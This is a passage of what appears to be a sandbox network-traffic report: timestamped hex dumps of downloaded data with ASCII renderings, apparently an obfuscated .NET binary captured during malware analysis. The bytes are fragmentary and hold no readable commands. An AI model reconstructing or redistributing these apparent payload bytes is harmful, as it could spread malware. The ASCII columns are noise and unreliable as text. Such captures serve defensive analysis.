ee 39 03 96 31 50 ba ec 68 8c ba 8f 54 8c 94 09 9d e1 52 66 76 1a 18 3c 39 bf 0a 41 82 91 ee 53 18 2e 16 a8 99 21
                                                                                  Data Ascii: +CSrkb=p[+*+>HYN^#GJbU;X3{jv7l5OCok7eGIL7y9oh=><y&>xbGjW%w(ay,'{{Pq=FD7m4b91PhTRfv<9AS.!
                                                                                  2022-05-02 11:02:01 UTC184INData Raw: 4d f9 46 ca 87 c7 9f fd 53 ff ae fc 5d 91 af 6b c5 8d 84 b4 f9 e4 f3 93 57 8e 9e de 56 07 69 40 43 aa 44 23 3e 36 c2 5a b4 8f 54 d6 ae 44 ba 49 d7 7d 9e 92 49 24 ae 7c 51 aa 7a 28 41 6c ee 21 35 c2 6a 26 1c eb 8c e2 a8 47 3d 2b 5f 0f 5e c8 3b 98 11 1c 15 e8 40 07 d4 90 dc 70 19 13 88 2f 85 b4 49 58 9d 69 b1 2c ef f7 fc fa 33 b9 96 d2 d2 ec 98 f9 e2 20 97 68 ec 87 6e e4 86 e4 3c 48 bf 31 f8 da 3b 59 67 1c ea c8 8b e5 3c f3 8a 74 00 40 93 0b de 46 80 33 47 60 e0 55 d8 0b 72 4d 08 3b 14 9b 38 83 d0 21 76 30 fb 6f c7 75 c1 9b 86 c8 dd 06 89 be 1e 35 7e 4d 43 95 86 bb b0 44 e3 6a 05 b1 d8 18 54 ec 3c 8a 58 a5 d1 4d 3b db 7c b7 ac 24 0a 01 da eb 63 e3 ca 94 14 34 50 84 99 f0 8e bf 4e cb 09 24 15 96 6b 9b 34 ec 78 cc 4c 01 5c 64 ec 72 27 c1 3f 94 46 6f 71 28 37
                                                                                  Data Ascii: MFS]kWVi@CD#>6ZTDI}I$|Qz(Al!5j&G=+_^;@p/IXi,3 hn<H1;Yg<t@F3G`UrM;8!v0ou5~MCDjT<XM;|$c4PN$k4xL\dr'?Foq(7
                                                                                  2022-05-02 11:02:01 UTC188INData Raw: c7 92 db e1 38 10 ed 0a 44 a2 f2 3a 54 19 44 54 27 93 6c cb 74 af db d2 47 9c b6 7e 61 70 3e 5e 13 91 cf 7b e1 36 94 6f 9a bb a7 d8 4b 53 32 de 5d 9b 87 fa 55 37 96 55 ce a7 16 df 49 bb ab 9a 1c ee bf 9f 2c e5 0d 85 f9 1f 26 29 f7 e9 52 98 de 3a 87 d0 e5 b3 c1 38 88 4c 75 75 5d 54 9b bd 60 29 94 79 32 aa 79 b6 9d d9 40 f6 83 c4 79 46 34 14 84 c0 f5 70 44 f1 5f 3e f1 9d 46 68 cb fb c3 94 85 09 e3 f4 3e d1 4d 64 7b ea e6 49 b5 7c cd 56 1e 7b 3c 44 09 b4 31 87 91 d5 59 23 2d da b1 84 e7 88 ee 1e 3e 8f e4 36 75 d2 c0 2a 1f 7b e8 2b 10 28 28 21 0e dd a2 2e c9 83 96 0d 8c 18 0e e2 f7 88 0b 34 e4 0f 60 7c 97 5a ee 4e 53 18 7a 12 41 3a a8 45 81 42 44 43 d3 0b 69 a0 13 bd 68 f6 14 18 ce 8b 45 cc 20 9b e2 51 37 29 b1 38 f2 ac 22 73 4d 99 12 05 45 51 ed cb 19 33 3a
                                                                                  Data Ascii: 8D:TDT'ltG~ap>^{6oKS2]U7UI,&)R:8Luu]T`)y2y@yF4pD_>Fh>Md{I|V{<D1Y#->6u*{+((!.4`|ZNSzA:EBDCihE Q7)8"sMEQ3:
                                                                                  2022-05-02 11:02:01 UTC191INData Raw: 3c 31 79 c5 5e f3 ec 25 33 1f d6 66 80 3c 76 f0 2d 23 c4 fb 65 c2 de 8b bd 2d 99 eb af 2f 7c be 14 65 c2 72 a0 f6 01 6b 7b f6 82 65 ab b3 46 3b 89 b7 9c a6 57 ee f1 2c b4 42 03 de 5a 33 12 80 08 9d 71 ee aa 03 be cf 50 c2 3f 8e 23 fb 0c 4e 24 5e e9 1e 16 e8 d4 1a d3 63 da 73 29 32 7f 65 07 f1 64 f4 25 f4 31 69 f7 d6 a0 7b 2b e1 93 29 28 21 d6 de 90 dd 29 53 40 f2 50 bb 74 5d f3 ba a6 36 07 0c 8b 25 8a 36 ce fa 69 e5 b7 67 c6 c8 b9 65 4a df 07 76 22 83 ec d4 cf 2c 6d c9 1c 72 6b ab 3e 2a 95 0c f8 bf b5 03 a1 b4 bb 45 93 79 c6 a6 44 b3 99 98 68 ad 70 bb 16 f4 13 d4 50 ef a7 4e 5b 3f eb 89 8c c3 0e 38 02 84 a9 a1 44 67 7c 43 3a f5 ca 3d a4 85 0b 62 19 f3 85 dc 30 b3 9c 0e 4f 4e 9f e4 89 c4 50 23 e0 a8 fe c1 1d 85 84 19 8b 83 b6 78 8e d5 1f 21 f2 57 22 2a fd
                                                                                  Data Ascii: <1y^%3f<v-#e-/|erk{eF;W,BZ3qP?#N$^cs)2ed%1i{+)(!)S@Pt]6%6igeJv",mrk>*EyDhpPN[?8Dg|C:=b0ONP#x!W"*
                                                                                  2022-05-02 11:02:01 UTC196INData Raw: fc a2 b5 3b 69 b3 75 93 a6 41 23 4e de 97 84 a6 5a 2f 8a db 9e 33 15 48 24 96 2a 32 a3 e7 ab d6 c2 92 13 46 2e 4c b8 26 1f 5e e5 31 28 c6 8e 47 47 c8 9a 8a b6 35 68 c9 2d 9e bb d9 d0 96 d3 31 fe c2 46 08 59 df 10 9f 6a 89 c9 70 ac 0a 6d a1 c1 c1 a9 a6 08 ae bf be a2 fb 65 20 df 10 3d 34 7a d4 ad b3 10 3b 43 cc e7 0d 9e b4 e8 6b b8 a6 a0 ee cb 78 7e 89 25 d9 85 a5 5a bc eb 4c c1 29 5a d4 54 97 99 43 4b f0 d5 0a 59 7e 21 1d 53 10 26 87 c4 e4 68 9e ba 68 0d af ff 12 54 18 85 31 9a 73 80 b3 7e f4 4d 2f c9 5e 3b 86 47 ee be 3b 3e a6 3e 7e 85 7a 1a 1d f5 1e 9f ea d2 54 36 df 9c 31 a7 bf 2c 6d 8f 41 80 4f f4 12 10 b3 c0 f8 fd 11 bf 0f e2 78 06 0e 14 8d 19 31 2d 57 a9 3f b2 f9 51 89 bc 0b f8 f1 c3 ed 6e 10 99 1b 8a 13 5a 50 d9 04 93 4a 6b 87 80 68 1d 43 44 d6 d8
                                                                                  Data Ascii: ;iuA#NZ/3H$*2F.L&^1(GG5h-1FYjpme =4z;Ckx~%ZL)ZTCKY~!S&hhT1s~M/^;G;>>~zT61,mAOx1-W?QnZPJkhCD
                                                                                  2022-05-02 11:02:01 UTC200INData Raw: 06 f2 fa 4b 12 d2 ce 26 ce 3e 0e 68 1f e3 0f f8 dc 29 90 3c dc 60 ac be ea 7d eb 47 29 82 9c 89 72 e9 ab 48 9d 18 b1 cc 12 ee 45 92 03 54 f1 98 8d 7f 30 d3 6e a8 8b 50 84 4e db fd 05 61 92 bf 97 0f f2 a1 7d ce 3f 7c fa 44 73 8c 43 2b 9a a3 7f a4 f0 cf 64 31 6d de bc 97 b9 43 9a d0 95 41 2a c5 eb 4d 26 d5 f9 be 05 28 b1 67 f1 37 d6 1a 26 d4 b6 39 3e 64 ab 3b 91 7f a2 d4 d1 72 0c 18 9f 32 c9 58 8c 19 0e 6e a5 7e b4 ea 66 6c ff ff c6 8b c3 60 59 78 00 67 4c df 62 a2 11 54 36 84 16 c8 17 2f 94 6e 48 2e 61 06 e3 bc 46 e3 f6 b5 5e e4 5f fa 0a 23 6a b4 29 24 d8 55 f3 ff 11 c6 05 d4 f5 f7 bb d2 d7 64 3c af 14 02 e9 59 70 ce 05 e9 a4 29 3c f2 39 59 44 c0 9d 70 ce d9 7c 6c 4b c8 7b 75 9c 7f 60 ac 39 40 89 54 cd 6d 50 a4 df 67 da 2c 13 12 df b7 1f d1 e7 71 9c fd a8
                                                                                  Data Ascii: K&>h)<`}G)rHET0nPNa}?|DsC+d1mCA*M&(g7&9>d;r2Xn~fl`YxgLbT6/nH.aF^_#j)$Ud<Yp)<9YDp|lK{u`9@TmPg,q
                                                                                  2022-05-02 11:02:01 UTC204INData Raw: a3 e8 f0 6f b0 36 83 c4 13 ba a0 32 bd a1 e1 c1 ec d9 b8 b2 0e e3 9e 1e 54 b7 61 51 fc fe f1 06 33 1c 71 9f 33 fe ee f6 cf dc 92 2c 1b 12 8d ee 31 25 99 82 cf c3 e0 d5 02 99 34 4d b0 21 f9 83 83 d0 70 26 44 ea 5e 4b c5 c0 35 34 61 f7 1e df 02 34 1d dc 7c f5 71 b3 11 93 a1 e1 db d3 fc 01 54 0c 94 eb 66 02 c7 4b 8f 6e af a1 92 77 33 de 8a 77 ec 55 28 fc c0 e5 a9 1a e2 e0 7e 4e 42 74 af 1f dd c4 8d 6a e6 d4 b3 87 d2 ee 5e 9d f2 73 6e 95 14 85 5b 2f 3f 91 33 fa bd 80 18 2d 18 1f a2 8c 46 62 b0 7c b2 af 4d e4 36 93 eb 60 52 06 7a 1e ba 13 f9 55 ee 1f 06 a5 9f c0 1e ce 51 27 c8 7b 76 20 32 fd d9 1f 0e 99 04 2f d2 41 ac fb dd 92 5d e3 d0 a6 b8 0a 1c 56 f5 41 80 08 1a e2 a2 23 29 a7 09 ab e3 75 9e 8c 53 1a 4f 8f 2e 5c 9b 90 ed 86 71 b2 39 48 ab 55 fb 35 9d 39 27
                                                                                  Data Ascii: o62TaQ3q3,1%4M!p&D^K54a4|qTfKnw3wU(~NBtj^sn[/?3-Fb|M6`RzUQ'{v 2/A]VA#)uSO.\q9HU59'
                                                                                  2022-05-02 11:02:01 UTC208INData Raw: 6e c4 06 24 0d c7 3b 25 66 d4 3e dc 35 ad a7 46 07 16 e6 72 7a 36 36 e1 0e e4 81 2c ca cc 65 83 d8 a2 9e 9d 4e be 3f ac d9 da 17 8a 0d 52 1d a7 92 b3 72 23 52 68 fa 7d 9e 38 6e 38 37 1f 8a cb 61 89 1d 86 91 ef 0b b6 db c2 82 6a 2b ef 49 13 82 da 67 1c ea c4 98 c3 8e 0e b8 7e 9f ff 0e af 0b c7 91 85 3c e0 b8 07 fb e2 57 fb 33 13 a9 0a ea 7e 9c ef e6 a7 5f 28 f1 40 8d 71 ee 32 7c 73 ab bb c4 ba 0f 27 95 23 10 f8 0b a7 b6 4e 9f 6e 8f ed 10 7b 7d 99 90 f5 96 91 4b ac 9f 4c ed fd e3 5e c3 8f 17 1e b1 25 2b fa 63 1f 0d 54 df 59 0d 31 f3 af 68 32 fc c1 93 b4 fb be 4f e2 95 46 f6 55 1c e5 d3 8f f3 db 6c c5 7f 79 fa 34 b5 ac 9d 01 5b 4c d2 6b 94 1c 71 17 33 3c d0 c0 7f 6e 5e 6a ca e2 b7 77 90 b2 39 bc 9a 50 9b 33 ed 57 e7 73 20 e5 b1 8e b0 c7 94 35 41 0f 86 88 42
                                                                                  Data Ascii: n$;%f>5Frz66,eN?Rr#Rh}8n87aj+Ig~<W3~_(@q2|s'#Nn{}KL^%+cTY1h2OFUly4[Lkq3<n^jw9P3Ws 5AB
                                                                                  2022-05-02 11:02:01 UTC212INData Raw: 03 54 c1 61 fc c7 fa c0 ff e8 a1 31 2f 93 20 af ac 7b bd 91 15 20 94 8f 5d ae 9a 3e b0 13 6e a7 d2 4c 76 d5 b5 b9 7c 9f 10 f2 2c 91 2e 79 aa 8c f7 21 b5 a4 df 4e d1 65 12 8c cc 70 4b 55 7c 81 40 45 b7 79 6b 9b 53 75 ed 9f eb f8 95 41 7c c6 41 4a 58 af 94 9d af a8 5b b6 7c 7a f7 54 24 1c ae 28 ac 38 0d 30 2e 7d a8 43 af bb b7 2b 7a 10 d8 b8 a8 bf c8 60 8b 2c 24 7b 9f 8d 07 de bc a0 dc ed b6 34 99 ea 53 4d c5 87 a1 86 cf 2a 5a dd 13 e5 1b bf 14 ec 29 e7 4c c0 4c ae 75 49 97 32 35 50 2b 61 1b a2 cd 83 b3 4a 5a f1 df d3 84 8d fa dd e4 2b 55 77 b5 3c 9c 6c 03 7e 62 1e 44 4b 28 5f 22 a1 09 10 dd 83 07 57 dc ef 24 b8 53 73 cf 38 f3 9e 00 9b 40 a3 7b fa 77 3f 27 fa 47 9f 9e b5 c6 e8 29 72 9a 60 bf 4f d1 de 63 d3 b9 44 27 88 53 2b 43 ef d3 df e2 3e 25 3e c2 6e 86
                                                                                  Data Ascii: Ta1/ { ]>nLv|,.y!NepKU|@EykSuA|AJX[|zT$(80.}C+z`,${4SM*Z)LLuI25P+aJZ+Uw<l~bDK(_"W$Ss8@{w?'G)r`OcD'S+C>%>n
                                                                                  2022-05-02 11:02:01 UTC223INData Raw: 5e a9 4f 83 a2 7c dc c4 19 2e 2a 3a ec 8b 5b 60 95 30 b7 c7 6c 00 36 8c f3 3f c5 6f 9c 90 c7 2d 71 71 86 8c bc 9d ae 92 2f 75 33 f2 57 20 cc 92 cc 1f ff 39 e5 67 b8 18 a5 92 5a f1 48 f0 6f bf 49 47 82 01 8d 86 39 dc 0d 5c 62 0b b3 48 9a 7c 2e 13 f7 4e cc 44 22 ee 8a ae 5d ea 03 0d 09 fd 3b 80 5b 5c 8e 8b 4f 83 e6 23 99 df ad 14 f0 53 90 1a 44 11 4e 0c fe af 48 ea 98 4b 64 53 38 f6 63 10 37 7f de 2e 73 58 4e f2 f3 1e 16 b4 a2 99 a6 8a d9 17 ab 19 a3 f2 89 87 a2 8c 9b a9 5e b3 2e 4d ba 49 9e 67 4e 31 32 ca c5 32 4d ce cb af 52 d0 9e 1c 7f a9 5f e4 0b 49 26 bc 3c 09 e1 70 db b6 54 da 37 1c a1 d5 10 c1 f3 82 02 6e 9e 6c da d7 53 e6 f8 b0 f4 4f dd bb df 80 b6 3a e2 72 68 7e 9b 03 f7 d1 db 30 c0 01 d5 8d 7d 3f 40 f3 1f 3d fc d2 b7 c5 8f ff b2 9e a4 6a f4 ac 1b
                                                                                  Data Ascii: ^O|.*:[`0l6?o-qq/u3W 9gZHoIG9\bH|.ND"];[\O#SDNHKdS8c7.sXN^.MIgN122MR_I&<pT7nlSO:rh~0}?@=j
                                                                                  2022-05-02 11:02:01 UTC228INData Raw: 67 f2 2e e3 1d 8e 3b 78 5c cd 89 10 63 da f7 93 17 43 9c d3 37 e8 dd 25 d7 7f 69 b9 0b 48 4c fe 75 0b 2c 42 20 c1 d8 c7 41 2e e3 ef f0 12 e7 37 40 73 8a 08 31 19 a3 d1 86 77 29 a1 9f a9 3d bf b5 6c 2f 99 fa 63 9a 71 3f 5a d7 bf 90 66 dc 16 6c 91 4a cb b6 42 f6 95 cf c5 3b 6f 6f 07 91 93 86 22 ca 9c 25 33 0d 3c 26 e1 f1 9a 69 03 86 28 67 4b 0d ee b8 7e 7c f3 08 00 d2 43 bf e3 ad 71 31 79 89 98 64 47 f0 e1 fb 9b 73 8b c7 d9 53 08 f5 18 2d bb 28 48 2a 56 01 c0 7c 6f 1f ce 8e 05 20 ce e0 36 03 82 35 91 96 04 45 28 46 67 a6 f5 4a 16 cc 15 f3 e0 90 b1 fb d7 2e 5a af 50 c9 da f0 f0 c2 9e 96 a3 a0 c8 b6 46 8b 04 49 60 34 7c 23 da 13 10 1b 27 3e d1 d7 c0 53 f5 d9 09 9d 69 c3 dd 80 3c c3 3f 27 c8 3f 0a 2a 7c 60 48 3c 25 2a 32 a6 9b 87 f0 cd 50 60 66 71 36 96 f8 bf
                                                                                  Data Ascii: g.;x\cC7%iHLu,B A.7@s1w)=l/cq?ZflJB;oo"%3<&i(gK~|Cq1ydGsS-(H*V|o 65E(FgJ.ZPFI`4|#'>Si<?'?*|`H<%*2P`fq6
                                                                                  2022-05-02 11:02:01 UTC244INData Raw: f9 59 c1 c9 a4 d1 b3 56 2d ca 0e 77 a2 6a 03 e8 98 e0 b3 e0 23 5d 00 8f 46 8b aa 8b 61 df ee 09 40 8c 00 0c 98 47 26 a3 19 22 63 24 5d 29 0e 46 42 4c 9d cb a3 1a 29 0b 64 da 5c e6 08 88 9f 41 dd 20 29 6e a9 6a 26 1d 0f 2a 33 00 55 7b e0 83 e9 c2 01 7f f2 55 e4 a6 c0 49 81 f2 74 84 48 78 27 22 6e 11 57 06 38 9f f3 93 c4 24 e7 eb c6 6a 74 2d a4 7c 0c 84 88 40 7e 52 da dd 63 d8 5d 3f 6f 19 f5 4b b9 88 33 aa cf 99 3f 8c 34 5d e4 48 74 57 ac 07 73 c3 3e d8 13 48 29 3b ae 2d 63 b1 4e 58 e5 3c 88 7e 69 f1 0f 14 eb 65 a7 97 1d a0 66 d8 cb d2 e8 07 df 7d 9b 8f fe 66 c5 56 1b 85 52 e4 7f 8f ba 53 d1 33 fd 3d 6c c3 87 dc ba 21 0f 0e 90 ba e2 67 61 ab 59 fd e5 1b 87 b4 13 a5 4d 6b 69 43 8a 8b eb 6a 24 5f 3a 65 21 c7 4b 95 57 11 cf 1a cd c1 a4 00 36 73 df ee 42 12 77
                                                                                  Data Ascii: YV-wj#]Fa@G&"c$])FBL)d\A )nj&*3U{UItHx'"nW8$jt-|@~Rc]?oK3?4]HtWs>H);-cNX<~ief}fVRS3=l!gaYMkiCj$_:e!KW6sBw
                                                                                  2022-05-02 11:02:01 UTC255INData Raw: df 1d 25 69 95 aa e8 d5 f8 7c 8c 21 9c 6e 2c 65 dc 15 8d ec 23 35 70 c3 8e a8 62 f0 2d 89 f6 ea 08 90 09 f7 c3 b6 45 dc 22 26 f6 86 47 c2 d1 8c 69 56 a5 f4 2d 07 b8 1a 8c bb 2f 94 fd 31 dd 84 0c 0f ea 5d 1e b6 63 19 70 4f 6e fe 61 20 22 83 c5 fb 79 96 38 4d f6 28 57 a3 61 47 c3 b4 ab b2 aa 08 d1 1c 68 95 8d 6a a0 2c 92 44 da 41 90 3e 23 da 31 86 e7 5e be 5c 3f c0 ea 10 6d 3e 3e ba 1e 6e e2 fd 07 66 88 70 73 5e 56 03 76 08 57 76 10 b1 db 06 44 2f aa a4 a1 30 cc 3a e8 ea 18 fa 43 43 94 32 a7 4c 94 42 ff 63 e6 dc a6 91 e7 1e e0 92 bb db 66 f8 6e 70 e3 ae 63 af 2d e0 ab af 80 5f df c3 57 f6 ae f0 79 8c df 6c 49 ec 68 ef 08 41 6e 35 1a f1 42 a5 ce 63 0d 67 ba 03 4b 3e ab 74 58 bd 8f 96 aa fc 52 6a 9c aa 8a de 7c 87 da dc f2 d0 1f 0a f9 73 da 92 66 89 14 e0 f9
                                                                                  Data Ascii: %i|!n,e#5pb-E"&GiV-/1]cpOna "y8M(WaGhj,DA>#1^\?m>>nfps^VvWvD/0:CC2LBcfnpc-_WylIhAn5BcgK>tXRj|sf
                                                                                  2022-05-02 11:02:01 UTC271INData Raw: 15 64 6a 2e 02 54 2c ac 34 59 90 92 47 c5 95 92 ff c6 55 4f 45 93 ab fa 94 1a e8 b6 7f ce 61 ac 98 ca 5a 12 1f d5 7f db 28 81 29 21 97 ea a2 5b 63 47 3e f3 19 6c 4d af c2 e9 17 9a 3b d7 6b 43 e3 93 49 5d e1 81 97 c3 66 c8 d3 b9 c7 76 ef 9a 29 c6 58 06 fe ac 42 66 76 3c 28 38 36 6c 36 be 42 4c 32 ea 7d 81 15 ed 7d 49 a5 6d 9d f9 d0 43 2b 6c c7 86 3d f0 0c 4c 8b 08 3d 93 33 89 01 3d 83 5b f3 e5 ae 4e 55 d3 75 dc 4e 6a ef 1d 4b 7a 0b 3d 62 2b 57 61 25 3a b2 af 3e 57 60 05 00 0b b1 6f d3 a3 81 b4 85 c6 c2 16 8d 75 3d ff c5 f9 e1 b5 10 8a 0a 2f 77 3b fb 02 69 16 73 e8 48 cb 54 a4 b8 e3 f0 aa 02 27 87 5f 5a 08 08 54 3e 34 8c c0 34 d0 20 26 62 0a aa ce 32 de 28 68 7e 67 8b 3f 1a d8 75 ba 74 2b 94 1e 56 d8 46 2e 83 b6 ef 29 d9 9e 5f 72 e8 e3 a2 af f9 f6 cf 18 f8
                                                                                  Data Ascii: dj.T,4YGUOEaZ()![cG>lM;kCI]fv)XBfv<(86l6BL2}}ImC+l=L=3=[NUuNjKz=b+Wa%:>W`ou=/w;isHT'_ZT>44 &b2(h~g?ut+VF.)_r
                                                                                  2022-05-02 11:02:01 UTC287INData Raw: ab 04 d9 7c 5f 56 13 de 20 7a 09 d4 cb 60 9b 7e e2 4d a0 ff ed 4e 10 1c 23 0b 6d fc f0 44 0a d7 c7 7e e2 4b 4c ae 4f 3c a9 05 52 fb 42 79 7f 74 e9 3c 0d 20 11 4a 8e 98 b4 49 a7 49 50 73 31 cb ff c4 e9 66 eb 73 8b 43 b7 58 d3 c8 40 29 19 6f d2 f6 b1 cc 8f 3d 56 f2 76 d7 fe fe 65 e6 e6 71 1f 3d d6 43 1f cd bd 38 71 74 94 19 c4 16 ef b4 69 40 0b 2e 69 43 22 7a 9e 8a 7c c1 f6 42 bb ef 15 f6 aa 57 a1 b7 13 f1 01 b5 07 09 55 8a 7e 28 7d 4b d7 ec 75 6e e2 02 44 0b 77 fe 6a b3 13 4d 7f 2c 0a 1c 6a 57 76 e9 2c f0 8d 50 68 6d 65 a7 b1 63 8e bd e1 7d 2f ce a4 a7 d5 c2 7c e5 1c 25 82 15 09 b6 c9 81 52 9f da da ba dc a1 8a d1 3e 0e 9b f1 c2 93 be b6 01 71 57 04 9f 89 12 77 3e 77 3c d2 fb cc 7d 15 4b 05 13 ae a3 54 27 19 fb be fd 5a 44 25 3a 89 6f a6 8e 1a 81 5a 3a 2c
                                                                                  Data Ascii: |_V z`~MN#mD~KLO<RByt< JIIPs1fsCX@)o=Vveq=C8qti@.iC"z|BWU~(}KunDwjM,jWv,Phmec}/|%R>qWw>w<}KT'ZD%:oZ:,
                                                                                  2022-05-02 11:02:01 UTC303INData Raw: 00 9d 06 eb 1e 7b ee 79 5d 3e ca 97 4d 19 17 1e 5f a9 6a 36 2a 1d c7 a2 07 c0 4a b6 7a 44 4a c8 cd d6 84 d0 7c 6f ce 9f e4 a4 5c 9d ca b2 ea 20 23 7f 53 2e 94 34 1e fb b2 48 b3 3b 92 67 ed df 2f 83 1d b4 9f cb 4d bc d4 61 2f dd aa 12 c7 b8 bb 95 e5 2b e0 18 b8 46 1f 40 0c 0b 43 d4 46 4a 32 a1 99 cd 84 91 6d 97 f8 b6 8d 01 55 6f 67 04 57 99 ad 64 7d c0 96 b8 d7 1d cf bb d1 33 4c 1d 9c 53 17 f3 e9 fc 52 75 ed 9f d6 4b 18 dd e0 ae 27 3a 08 17 28 1d fc 7b f3 84 f8 8a 87 4c c7 70 02 63 5c 5a 08 41 62 87 f2 01 93 c3 fd 23 f6 0b 2f b8 4d 17 2a 1b 6a ee c8 7a ec cc c8 8a e6 79 04 ff 96 1c 00 02 69 3f dc dc e7 e5 f6 7c 64 c1 d2 e4 a3 be 43 2c 39 62 df 19 ea fe 03 27 a4 29 1f 51 5a b0 b1 8e 48 84 13 3b e2 fb 73 de 14 e3 38 35 ca 2b d9 d3 23 7f 59 1e 98 1b dc a4 29
                                                                                  Data Ascii: {y]>M_j6*JzDJ|o\ #S.4H;g/Ma/+F@CFJ2mUogWd}3LSRuK':({Lpc\ZAb#/M*jzyi?|dC,9b')QZH;s85+#Y)
                                                                                  2022-05-02 11:02:01 UTC319INData Raw: 12 08 1c 70 85 12 05 00 10 d8 83 11 bd 80 12 08 1c 70 85 12 04 20 0d 90 91 12 06 04 8c 91 12 02 02 07 1c 01 05 00 0a 02 02 07 1c 01 04 20 07 8c 91 12 06 04 88 91 12 07 1c 02 03 00 08 88 91 12 06 04 84 91 12 1c ec 84 12 02 00 09 1c ec 84 12 01 20 06 84 91 12 06 04 80 91 12 b9 80 12 bc 85 12 1c b9 80 12 04 00 0f b9 80 12 bc 85 12 1c b9 80 12 03 20 0c 80 91 12 06 04 7c 91 12 1c bc 85 12 02 00 09 7c 91 12 06 04 78 91 12 b9 80 12 bc 85 12 02 03 00 0c b9 80 12 bc 85 12 02 02 20 09 78 91 12 06 04 74 91 12 1c 01 02 00 07 74 91 12 06 04 70 91 12 1c 5c 85 11 02 00 09 70 91 12 06 04 6c 91 12 1c 1c 08 03 00 08 6c 91 12 06 04 68 91 12 0e 1c 08 03 00 08 0e 1c 08 02 20 05 68 91 12 06 04 64 91 12 1c 64 85 12 1c 08 04 00 0b 1c 64 85 12 1c 08 03 20 08 64 91 12 06 04 60 91
                                                                                  Data Ascii: pp ||x xttp\pllh hddd d`
                                                                                  2022-05-02 11:02:01 UTC335INData Raw: 0e 0b 09 09 0b 0b 09 09 09 09 09 09 09 08 08 91 80 12 fd 83 12 bd 80 12 1d 08 49 81 12 1d b9 80 12 02 08 08 49 83 12 08 08 08 08 09 08 09 08 08 09 08 08 24 86 12 08 09 09 09 05 1d 08 08 05 1d 08 08 02 71 81 12 15 02 1c 49 83 12 1d bd 80 12 32 07 51 d9 80 11 01 01 00 06 0d 82 11 09 82 11 05 82 11 0e 01 04 20 0d 05 1d 08 61 84 12 08 05 1d 09 08 08 08 08 0e 05 1d 05 1d 0a 05 1d 08 09 31 82 12 08 0e 08 09 08 08 08 08 0a 01 82 12 09 02 0a 35 82 12 09 08 05 1d 65 81 12 0a 09 08 05 1d 0a 08 2a 07 3d 09 09 09 08 04 07 06 61 84 12 0a 08 09 09 04 00 09 08 05 1d 08 08 05 1d 08 05 20 0a 08 08 05 1d 31 82 12 01 04 00 0a 05 1d 09 65 81 12 31 82 12 01 04 00 0c 0e 0e 59 84 12 02 00 07 45 82 12 01 07 05 45 82 12 00 00 05 0b 09 09 0b 0b 09 09 09 09 09 09 09 09 08 09 08 08
                                                                                  Data Ascii: II$qI2Q a15e*=a 1e1YEE
                                                                                  2022-05-02 11:02:01 UTC351INData Raw: 68 83 11 10 18 10 40 11 04 20 11 1c 81 82 12 5c 83 11 10 68 83 11 10 34 81 11 18 10 7d 82 12 06 20 16 5c 83 11 10 68 83 11 10 34 81 11 18 10 40 11 04 20 11 18 40 11 01 20 05 08 18 02 02 20 05 7d 82 12 60 83 11 10 18 02 20 0a 1c 81 82 12 60 83 11 10 18 09 18 7d 82 12 06 20 10 60 83 11 10 18 09 18 18 04 20 0a 7d 82 12 09 10 0b 10 18 10 40 11 04 20 0d 1c 81 82 12 09 09 09 09 10 0b 10 19 19 18 10 18 18 7d 82 12 0c 20 16 09 09 09 09 10 0b 10 19 19 18 10 18 18 40 11 0a 20 11 1c 81 82 12 09 10 18 7d 82 12 04 20 0c 09 10 18 40 11 02 20 07 7d 82 12 3c 81 11 10 44 81 11 10 54 81 11 10 54 81 11 10 02 05 20 16 1c 81 82 12 3c 81 11 10 44 81 11 10 0e 18 09 02 54 81 11 10 54 81 11 10 0e 0e 7d 82 12 0c 20 1f 3c 81 11 10 44 81 11 10 0e 18 09 02 54 81 11 10 54 81 11 10 0e
                                                                                  Data Ascii: h@ \h4} \h4@ @ }` `} ` }@ } @ } @ }<DTT <DTT} <DTT
                                                                                  2022-05-02 11:02:01 UTC367INData Raw: 4f 00 64 4e 78 55 69 6f 63 76 56 74 00 67 36 32 58 31 6a 63 4c 76 6c 00 4f 6f 37 31 6d 45 63 52 4b 48 00 55 4a 55 69 43 37 63 37 35 6a 00 72 4e 62 43 77 36 63 47 6a 4d 00 50 4e 30 36 52 32 63 4a 50 74 00 4a 52 55 53 57 72 63 79 39 42 00 61 33 67 51 4d 69 63 54 35 4d 00 75 62 58 58 72 57 63 4f 72 78 00 67 78 67 31 50 7a 43 36 77 75 00 72 63 4e 56 33 75 43 51 58 52 00 56 53 76 4f 48 53 43 75 56 78 00 34 44 59 43 6f 56 43 58 68 6f 00 42 54 36 74 67 54 43 51 6e 4d 00 72 6c 71 4e 78 34 43 36 64 65 00 45 75 76 77 6f 79 43 31 33 4b 00 67 51 45 5a 61 63 43 50 33 56 00 42 75 72 72 78 6e 43 74 65 63 00 73 37 30 32 77 62 43 67 54 48 00 71 67 39 44 73 76 43 4d 42 4f 00 47 79 73 50 73 74 43 63 5a 4a 00 52 30 43 63 52 65 43 35 49 66 00 64 57 75 4d 38 66 43 30 79 48 00
                                                                                  Data Ascii: OdNxUiocvVtg62X1jcLvlOo71mEcRKHUJUiC7c75jrNbCw6cGjMPN06R2cJPtJRUSWrcy9Ba3gQMicT5MubXXrWcOrxgxg1PzC6wurcNV3uCQXRVSvOHSCuVx4DYCoVCXhoBT6tgTCQnMrlqNx4C6deEuvwoyC13KgQEZacCP3VBurrxnCtecs702wbCgTHqg9DsvCMBOGysPstCcZJR0CcReC5IfdWuM8fC0yH
                                                                                  2022-05-02 11:02:01 UTC383INData Raw: 00 47 78 33 30 51 65 32 46 48 56 37 74 6a 57 4e 54 6e 6e 4f 76 00 4e 6c 47 62 45 6d 6c 54 54 6c 64 77 6a 57 73 74 46 74 55 52 00 51 6a 32 69 52 73 51 59 64 43 32 65 6a 57 77 41 71 57 66 68 00 45 71 76 74 32 71 74 4e 6f 64 00 37 53 67 31 6f 37 6c 33 4e 4d 00 55 4d 69 31 76 55 30 62 42 71 64 6b 6a 57 4a 6a 39 65 57 4f 00 58 76 44 5a 4f 36 6a 69 73 38 6a 66 6a 57 36 31 79 79 46 4c 00 42 4a 5a 41 59 64 43 6d 32 32 46 41 6a 57 36 4e 6c 65 5a 71 00 77 53 48 44 4b 74 74 58 4e 7a 00 76 52 62 57 32 61 6c 34 6c 6c 00 49 43 49 30 68 69 57 73 37 41 73 71 6a 57 46 31 56 49 67 4b 00 56 56 53 58 44 57 74 35 44 6c 43 39 6a 57 68 67 73 56 68 6e 00 32 6a 68 55 4d 61 47 48 43 76 00 54 4f 45 49 6b 6e 47 30 37 6f 00 55 44 66 66 34 4e 47 65 66 68 00 79 55 42 61 62 4e 6a 6e 56
